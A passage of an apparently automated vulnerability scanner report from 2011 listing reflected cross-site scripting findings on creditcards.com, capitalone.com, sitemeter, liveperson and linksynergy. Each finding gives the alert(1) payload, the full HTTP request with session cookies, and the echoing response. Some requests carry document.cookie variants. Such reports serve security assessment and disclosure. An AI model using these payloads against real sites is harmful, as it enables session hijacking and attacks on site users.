User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCCID=173.193.214.243_20110617053924_f5fd4d9c; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; SSSC=3.49665759.60098554.232.9134; PHPSESSID=eaa1e85235ccec63f45bfe7e1b69c40f; ACTREF=eaa1e85235ccec63f45bfe7e1b69c40f_999__201106170650; CURRREF=999; PREVREF=999; s_cc=true; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%2C%5B%27999-0-0-0%27%2C%271308311460361%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308311924490%27%5D%5D; s_sq=ccardsccdc-us%3D%2526pid%253DTYPE%25253Apoints-rewards%2526pidt%253D1%2526oid%253Dhttp%25253A//blogs.creditcards.com/%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:00:00 GMT
Server: Apache
Content-Type: text/html
Content-Length: 102604

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="sixapart-standard">
<head>

<li
...[SNIP]...
<script language="JavaScript" type="text/javascript">
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.pageName="news:blogs:?ba3d2"-alert(1)-"9c8eb9e5473=1"
s.server=""
s.channel="news"
s.pageType=""
s.prop1="news"
s.prop2=""
s.prop3=""
s.prop4=""
s.prop5=""
s.prop6=""
s.prop7=""
s.prop8=""
/* Conversion Variables */
s.campaign=""
s.state=""
s.zip=""
s
...[SNIP]...

3.2. http://blogs.creditcards.com/fine-print/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blogs.creditcards.com
Path:	/fine-print/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3cf6d"-alert(1)-"cf7270b0551 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /fine-print/?3cf6d"-alert(1)-"cf7270b0551=1 HTTP/1.1
Host: blogs.creditcards.com
Proxy-Connection: keep-alive
Referer: http://blogs.creditcards.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCCID=173.193.214.243_20110617053924_f5fd4d9c; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; SSSC=3.49665759.60098554.232.9134; PHPSESSID=eaa1e85235ccec63f45bfe7e1b69c40f; ACTREF=eaa1e85235ccec63f45bfe7e1b69c40f_999__201106170650; CURRREF=999; PREVREF=999; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%2C%5B%27999-0-0-0%27%2C%271308311460361%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308311937698%27%5D%5D; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:00:39 GMT
Server: Apache
Content-Type: text/html
Content-Length: 101946

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="sixapart-standard">
<head>

<li
...[SNIP]...
<script language="JavaScript" type="text/javascript">
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.pageName="news:blogs:?3cf6d"-alert(1)-"cf7270b0551=1"
s.server=""
s.channel="news"
s.pageType=""
s.prop1="news"
s.prop2=""
s.prop3=""
s.prop4=""
s.prop5=""
s.prop6=""
s.prop7=""
s.prop8=""
/* Conversion Variables */
s.campaign=""
s.state=""
s.zip=""
s
...[SNIP]...

3.3. http://click.linksynergy.com/fs-bin/click [offerid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://click.linksynergy.com
Path:	/fs-bin/click

Issue detail

The value of the offerid request parameter is copied into the HTML document as plain text between tags. The payload 4393f<script>alert(1)</script>8b2443f3bac was submitted in the offerid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fs-bin/click?id=EhraRx8K/BE&offerid=4393f<script>alert(1)</script>8b2443f3bac&type=3&subid=0&u1=1124cf812011e906cc17069a599054 HTTP/1.1
Host: click.linksynergy.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22034407&pg=17&pgpos=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsn_statp=XJG0rhcAAADvdDvwMI7FTQ%3D%3D; lsn_qstring=EhraRx8K%2FBE%3A227478%3A1120e8cd201180061c17060a514329; lsn_track=UmFuZG9tSVZTGei6OP%2B7uQzzprzIV6pvp2RqaKp7Pb5IaO9VwdRdPkp1DAnI1Qzrj8wqGV%2FSx%2FwxjPyvCsywig%3D%3D; lsclick_mid2291="2011-06-17 11:51:31.045|EhraRx8K_BE-PWS2r5T7Tzgjw3IqElyKzA"

Response

HTTP/1.1 400 Bad Request
Server: Apache-Coyote/1.1
Content-Length: 258
Date: Fri, 17 Jun 2011 12:00:15 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title>Error</title></head><body>
Bad number format in offerid: For input string: "4393f<script>alert(1)</script>8b2443f3bac"
</body>
...[SNIP]...

3.4. http://oc.creditcards.com/trans_node.php [c parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://oc.creditcards.com
Path:	/trans_node.php

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload fb2c7<script>alert(1)</script>63bd7c4c2ea was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /trans_node.php?aid=999&tid=&cid=9999&did=9999&fid=17&pos=1&evid=1011106170650383a0cd48cdfdd3a86c&ref=&oid=1012011061706585783008788&data3=0&sid=1889&c=22105561fb2c7<script>alert(1)</script>63bd7c4c2ea HTTP/1.1
Host: oc.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22105561&pg=17&pgpos=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCCID=173.193.214.243_20110617053924_f5fd4d9c; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; SSSC=3.49665759.60098554.232.9134; PHPSESSID=eaa1e85235ccec63f45bfe7e1b69c40f; ACTREF=eaa1e85235ccec63f45bfe7e1b69c40f_999__201106170650; CURRREF=999; PREVREF=999; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%2C%5B%27999-0-0-0%27%2C%271308311460361%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308311937698%27%5D%5D; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:03:50 GMT
Server: Apache
Content-Length: 71
Content-Type: text/html

Invalid Clickable ID: 22105561fb2c7<script>alert(1)</script>63bd7c4c2ea

3.5. http://oc.creditcards.com/trans_node.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://oc.creditcards.com
Path:	/trans_node.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7152d<script>alert(1)</script>d5fbc91297f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /trans_node.php?aid=999&tid=&cid=9999&did=9999&fid=17&pos=1&evid=1011106170650383a0cd48cdfdd3a86c&ref=&oid=1012011061706585783008788&data3=0&sid=1889&c=2210/7152d<script>alert(1)</script>d5fbc91297f5561 HTTP/1.1
Host: oc.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22105561&pg=17&pgpos=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCCID=173.193.214.243_20110617053924_f5fd4d9c; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; SSSC=3.49665759.60098554.232.9134; PHPSESSID=eaa1e85235ccec63f45bfe7e1b69c40f; ACTREF=eaa1e85235ccec63f45bfe7e1b69c40f_999__201106170650; CURRREF=999; PREVREF=999; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%2C%5B%27999-0-0-0%27%2C%271308311460361%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308311937698%27%5D%5D; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:07:22 GMT
Server: Apache
Content-Length: 72
Content-Type: text/html

Invalid Clickable ID: 2210/7152d<script>alert(1)</script>d5fbc91297f5561

3.6. http://s46.sitemeter.com/js/counter.asp [site parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s46.sitemeter.com
Path:	/js/counter.asp

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f2e63'%3balert(1)//39affea6cc8 was submitted in the site parameter. This input was echoed as f2e63';alert(1)//39affea6cc8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /js/counter.asp?site=s46cccgblogf2e63'%3balert(1)//39affea6cc8 HTTP/1.1
Host: s46.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://blogs.creditcards.com/fine-print/?3cf6d%22-alert(document.cookie)-%22cf7270b0551=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IP=173%2E193%2E214%2E243

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 17 Jun 2011 12:11:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7320
Content-Type: application/x-javascript
Expires: Fri, 17 Jun 2011 12:21:16 GMT
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServe
...[SNIP]...
.addEventListener(sEvent, func, false);
       else
           if (obj.attachEvent)
            obj.attachEvent( "on"+sEvent, func );
           else
               return false;
       return true;
   }

}

SiteMeter.init('s46cccgblogf2e63';alert(1)//39affea6cc8', 's46.sitemeter.com', '');

var g_sLastCodeName = 's46cccgblogf2e63';alert(1)//39affea6cc8';
// ]]>
...[SNIP]...

3.7. http://s46.sitemeter.com/js/counter.js [site parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s46.sitemeter.com
Path:	/js/counter.js

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d7a9f'%3balert(1)//8e5028df652 was submitted in the site parameter. This input was echoed as d7a9f';alert(1)//8e5028df652 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /js/counter.js?site=s46cccgblogd7a9f'%3balert(1)//8e5028df652 HTTP/1.1
Host: s46.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://blogs.creditcards.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Fri, 17 Jun 2011 11:59:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7320
Content-Type: application/x-javascript
Expires: Fri, 17 Jun 2011 12:09:14 GMT
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServe
...[SNIP]...
.addEventListener(sEvent, func, false);
       else
           if (obj.attachEvent)
            obj.attachEvent( "on"+sEvent, func );
           else
               return false;
       return true;
   }

}

SiteMeter.init('s46cccgblogd7a9f';alert(1)//8e5028df652', 's46.sitemeter.com', '');

var g_sLastCodeName = 's46cccgblogd7a9f';alert(1)//8e5028df652';
// ]]>
...[SNIP]...

3.8. http://sales.liveperson.net/visitor/addons/deploy.asp [site parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://sales.liveperson.net
Path:	/visitor/addons/deploy.asp

Issue detail

The value of the site request parameter is copied into a JavaScript rest-of-line comment. The payload e97b1%0aaf153dd702 was submitted in the site parameter. This input was echoed as e97b1
af153dd702 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /visitor/addons/deploy.asp?site=32528459e97b1%0aaf153dd702&d_id=sb-sales-english HTTP/1.1
Host: sales.liveperson.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a%27%3balert(document.location)//fd5f10cff0
Cookie: LivePersonID=LP i=16601155425835,d=1302186497; HumanClickACTIVE=1308312408486; ASPSESSIONIDSARDTDCT=JHCIMLECCHIIGDFOEGCGBDHM

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:07:43 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Last-Modified: Tue, 14 Jul 2009 13:04:47 GMT
Content-Length: 2140
Content-Type: application/x-javascript
Set-Cookie: ASPSESSIONIDQASASRDT=JJDAEEFBPEADMJJLAIBFHCMD; path=/
Cache-control: public, max-age=3600, s-maxage=3600

//Plugins for site 32528459e97b1
af153dd702
lpAddMonitorTag();
typeof lpMTagConfig!="undefined"&&function(a){lpMTagConfig.isMobile=!1;if(/android|avantgo|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maem
...[SNIP]...

3.9. http://www.capitalone.com/smallbusiness/cards/venture-for-business/ [external_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/smallbusiness/cards/venture-for-business/

Issue detail

The value of the external_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1040a'%3balert(1)//fd5f10cff0 was submitted in the external_id parameter. This input was echoed as 1040a';alert(1)//fd5f10cff0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a'%3balert(1)//fd5f10cff0 HTTP/1.1
Host: www.capitalone.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22105561&pg=17&pgpos=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; itc=CAPITALONE11NZZZintmktgD4; caponesn=d526e113S04syM9LTU6OK7YyMrNScnRzszIyMLAwMDEw0i1JNzDUNTIwNDQwM7BUso4zNDU1sAQA; BIGipServerpl_capitalone.com_80=828974346.29215.0000; external_id=GAN_ZZ10700001_USCGAN_j26689465k112308_631528059; caponecc=xp1%3D_%3Achannel%3DAFF%2A20080402%3Atestgroup%3Dtg01%2A20110609; smartTracking=

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:59:21 GMT
Server: Apache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: WWWJSESSIONID=qnm5N7BZvm2LwTLsDn0jL6RSWFbJBnk2ThWjXjd1zrvXWCT58MK2!1391065199!-711929719; domain=.capitalone.com; path=/; secure
Set-Cookie: Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; domain=.capitalone.com; expires=Saturday, 18-Jun-2011 11:59:21 GMT; path=/
Set-Cookie: caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; domain=.capitalone.com; expires=Monday, 14-Jun-2021 11:59:21 GMT; path=/
Set-Cookie: SmallBusiness=6b4455bbcy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCqcYaqca0oSC3KTM1LToUr8%2FF38gXSmcGpxcWZ%2BXnO%2BaVAM4xAwp55KGKGNQA%3D; domain=.capitalone.com; expires=Saturday, 18-Jun-2011 11:59:21 GMT; path=/
Set-Cookie: external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a';alert(1)//fd5f10cff0; domain=.capitalone.com; expires=Saturday, 18-Jun-2011 11:59:21 GMT; path=/
Set-Cookie: portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D; domain=.capitalone.com; expires=Saturday, 18-Jun-2011 11:59:21 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html; charset=UTF-8
Content-Length: 39021

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US"><head><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"/><meta http-e
...[SNIP]...
; //1st page of the application
lpAddVars('page','Start_OrderTotal',''); //1st page of the application
lpAddVars('session','ExternalID','GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a';alert(1)//fd5f10cff0'); //All pages
lpAddVars('session','PffsrcID',''); //All pages
lpAddVars('session','EosUser',''); //All pages
lpAddVars('session','TestCell','02'); //All pages
lpAddVar
...[SNIP]...

3.10. http://www.creditcards.com/business.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/business.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3edd7'><script>alert(1)</script>8b633d41d62 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /business.php?3edd7'><script>alert(1)</script>8b633d41d62=1 HTTP/1.1
Host: www.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/points-rewards.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCCID=173.193.214.243_20110617053924_f5fd4d9c; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; SSSC=3.49665759.60098554.232.9134; Apache=66.219.46.81.1308311437978272; PHPSESSID=eaa1e85235ccec63f45bfe7e1b69c40f; ACTREF=eaa1e85235ccec63f45bfe7e1b69c40f_999__201106170650; CURRREF=999; PREVREF=999; SSBAL=node.web1; s_cc=true; CCsCookieimp=1308311914; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%2C%5B%27999-0-0-0%27%2C%271308311460361%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308311931237%27%5D%5D; s_sq=ccardsccdc-us%3D%2526pid%253DTYPE%25253Apoints-rewards%2526pidt%253D1%2526oid%253Dhttp%25253A//www.creditcards.com/business.php%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:00:14 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 43493

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<title>Business Credit Cards - CreditCards.com</title>
<meta name="keywords"
...[SNIP]...
<IMG SRC='http://www.creditcards.com/xtrack.php?3edd7'><script>alert(1)</script>8b633d41d62=1' border=0 width=1 height=1>
...[SNIP]...

3.11. http://www.creditcards.com/low-interest-page-4.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/low-interest-page-4.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9e8f9'><script>alert(1)</script>dbc00122aec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /low-interest-page-4.php?9e8f9'><script>alert(1)</script>dbc00122aec=1 HTTP/1.1
Host: www.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/low-interest.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCCID=173.193.214.243_20110617053924_f5fd4d9c; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; SSSC=3.49665759.60098554.232.9134; Apache=66.219.46.81.1308312739652864; PHPSESSID=51aa464adc6191c5beb2eec47b2e003f; ACTREF=51aa464adc6191c5beb2eec47b2e003f_999__201106170712; CURRREF=999; THIRDREF=999; PREVREF=999; SSBAL=node.web1; s_cc=true; CCsCookieimp=1308312780; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%2C%5B%27999-0-0-0%27%2C%271308311460361%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308312000435%27%5D%2C%5B%27999-0-0-0%27%2C%271308313704660%27%5D%5D; s_sq=ccardsccdc-us%3D%2526pid%253DTYPE%25253Alow-interest%2526pidt%253D1%2526oid%253Dhttp%25253A//www.creditcards.com/low-interest-page-4.php%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:29:42 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 29157

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<title>Low Interest Credit Cards - CreditCards.com</title>
<meta name="keywo
...[SNIP]...
<IMG SRC='http://www.creditcards.com/xtrack.php?9e8f9'><script>alert(1)</script>dbc00122aec=1' border=0 width=1 height=1>
...[SNIP]...

3.12. http://www.creditcards.com/low-interest.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/low-interest.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 86305'><script>alert(1)</script>bb92682d3cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /low-interest.php?86305'><script>alert(1)</script>bb92682d3cf=1 HTTP/1.1
Host: www.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCCID=173.193.214.243_20110617053924_f5fd4d9c; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; CCsCookieimp=1308312001; SSSC=3.49665759.60098554.232.9134; Apache=66.219.46.81.1308312739652864; PHPSESSID=51aa464adc6191c5beb2eec47b2e003f; ACTREF=51aa464adc6191c5beb2eec47b2e003f_999__201106170712; CURRREF=999; THIRDREF=999; PREVREF=999; SSBAL=node.web1; s_cc=true; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%2C%5B%27999-0-0-0%27%2C%271308311460361%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308312000435%27%5D%2C%5B%27999-0-0-0%27%2C%271308312744303%27%5D%5D; s_sq=ccardsccdc-us%3D%2526pid%253Dhome%2526pidt%253D1%2526oid%253Dhttp%25253A//www.creditcards.com/low-interest.php%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:13:49 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
